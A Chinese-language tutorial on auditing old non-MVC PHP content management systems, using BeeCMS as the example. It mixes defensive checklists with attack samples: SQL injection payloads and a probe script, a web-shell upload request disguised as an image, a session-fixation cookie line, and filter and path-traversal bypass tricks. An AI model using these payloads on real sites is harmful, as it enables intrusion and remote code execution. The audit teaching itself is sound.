非MVC架构PHP程序深度审计指南：以BeeCMS为例构建系统化漏洞挖掘框架

从老式CMS架构特点看安全审计的特殊性

当我们面对像BeeCMS 4.0这样的传统PHP程序时，首先需要理解其与现代MVC框架的本质区别。这类"前MVC时代"的产物通常呈现以下典型特征：

• 功能模块物理隔离：每个功能模块往往拥有独立的目录和入口文件，例如/article/存放文章相关功能，/member/处理用户账户
• 全局包含文件承担核心功能：init.php、fun.php这类文件替代了框架的基类，提供数据库连接、输入过滤等基础服务
• 直接文件访问机制：没有统一路由控制，用户可通过直接访问PHP文件触发功能执行
• 代码复用程度低：相同安全逻辑（如权限检查）可能在不同文件中重复实现且标准不一

这种架构带来的安全审计挑战在于：漏洞往往隐藏在那些未被充分保护的"边缘功能"文件中，或是由于全局安全策略执行不一致而产生。我曾审计过一个地方政府网站，攻击者正是通过直接访问/admin/backup_db.php这个隐藏功能点实现了数据库导出，而该文件恰巧遗漏了权限验证。

建立高效审计路径：四步定位法实战

1. 关键文件测绘与架构还原

首先使用tree命令生成目录结构图，重点关注以下几类文件：

bash复制# 生成目录结构树并过滤关键文件类型
tree -f -L 3 | grep -E '\.php|\.inc|\.config'

典型的老式CMS目录通常包含这些关键元素：

提示：使用find命令快速定位敏感操作函数：
find . -name "*.php" -exec grep -l "unlink\|exec\|system" {} \;

2. 输入输出流追踪技术

在审计init.php这类全局包含文件时，要特别关注其如何处理用户输入。以下是一个典型的输入过滤缺陷模式：

php复制// 不完整的过滤逻辑示例
function fl_value($str){
    return preg_replace('/select|insert/i','',$str); 
}

// 双写绕过示例
$payload = "selselectect * from users"; // 过滤后变为"select * from users"

针对这种过滤机制，审计时需要：

1. 确认过滤函数是否在所有入口被调用
2. 检查替换操作是否可被绕过（如大小写、双写、编码）
3. 验证过滤后数据的使用场景（直接拼接SQL/文件路径等）

我曾遇到一个案例，系统对../的过滤仅执行一次替换，导致....//最终被解析为../，成功实现路径穿越。

3. 权限验证机制逆向分析

非MVC架构中，权限检查往往通过包含验证文件实现，如：

php复制// 不安全的验证包含方式
$page = $_GET['module'];
require_once("modules/$page.php"); // 直接包含用户可控参数

// 相对安全的做法
$allowList = ['news','products'];
if(in_array($_GET['module'], $allowList)){
    require_once("modules/{$_GET['module']}.php");
}

审计时要特别注意：

• 验证逻辑是否在所有管理接口被包含
• 是否存在可被绕过的条件判断（如仅检查isset($_SESSION['admin'])而不验证具体值）
• 直接对象引用（IDOR）风险，如/download.php?id=123可遍历其他用户文件

4. 文件操作安全边界测试

文件上传/删除功能是老式CMS的高危点，审计时需验证：

1. 上传文件类型校验是否仅依赖客户端检查
2. 文件重命名策略是否可预测（如使用时间戳序列）
3. 删除操作是否限制在指定目录内

php复制// 不安全的文件删除实现
$file = $_GET['file']; // 用户完全可控
unlink("/uploads/".$file);

// 更安全的实现
$allowFiles = ['1.jpg','2.pdf'];
if(in_array($_GET['file'], $allowFiles)){
    unlink("/uploads/".basename($_GET['file']));
}

典型漏洞挖掘实战：以BeeCMS为例

SQL注入的多维度检测

当发现像BeeCMS登录处这样的注入点时，可采用阶梯式验证法：

1. 基础探测：测试单引号触发错误' → 报错则可能存在注入
2. 过滤测试：尝试selselectect等双写绕过
3. 上下文分析：确认注入点位于查询的哪个部分（WHERE/SELECT/ORDER BY等）
4. 利用验证：构造联合查询获取管理员会话

python复制# 自动化检测脚本示例（概念验证）
import requests

def test_sql_injection(url):
    payloads = ["'", "1' OR '1'='1", "admin'--"]
    for p in payloads:
        r = requests.post(url, data={'user': p, 'pass':'test'})
        if "error in your SQL" in r.text:
            return f"Vulnerable to SQLi with payload: {p}"
    return "No SQLi detected"

print(test_sql_injection("http://target.com/login.php"))

文件上传的突破技巧

除了常规的MIME类型和扩展名绕过，在老系统中还可以尝试：

1. 解析漏洞利用：上传.php.jpg配合Apache解析缺陷
2. 临时文件竞争：在文件被删除前访问上传的恶意脚本
3. 日志注入：将PHP代码写入访问日志后包含日志文件

http复制POST /upload.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryABC123

------WebKitFormBoundaryABC123
Content-Disposition: form-data; name="file"; filename="shell.php.jpg"
Content-Type: image/jpeg  # 伪造Content-Type

<?php system($_GET['cmd']);?>
------WebKitFormBoundaryABC123--

权限系统的非常规突破

当无法直接获取后台权限时，可尝试：

1. 密码重置逻辑缺陷：修改密码时是否验证原密码
2. 会话固定攻击：强制用户使用已知的会话ID
3. 功能滥用：如通过留言板执行管理员操作（需XSS配合）

javascript复制// 会话固定示例（需能设置用户Cookie）
document.cookie = "PHPSESSID=attacker_controlled_id; path=/";

构建可持续的审计知识体系

建议建立自己的审计检查清单，包含以下维度：

1. 输入源矩阵：

   • GET/POST参数
   • Cookie头
   • 文件上传
   • 数据库存储（二次注入）

2. 敏感函数映射：

   markdown复制- **数据库操作**：`mysql_query`, `mysqli::prepare`
   - **文件操作**：`fopen`, `unlink`, `file_get_contents`
   - **命令执行**：`exec`, `system`, `passthru`
   - **反序列化**：`unserialize`
   

3. 上下文判断规则：

   • 用户输入是否直接进入动态包含include($_GET['page'])
   • 输出时是否禁用HTML转义echo $_GET['q']
   • 加密操作是否使用弱算法md5($password)

在最近一次对某企业CMS的审计中，通过系统化检查unserialize()调用链，发现了一处可导致远程代码执行的反序列化漏洞，而该CMS的官方文档甚至未提及此功能的存在。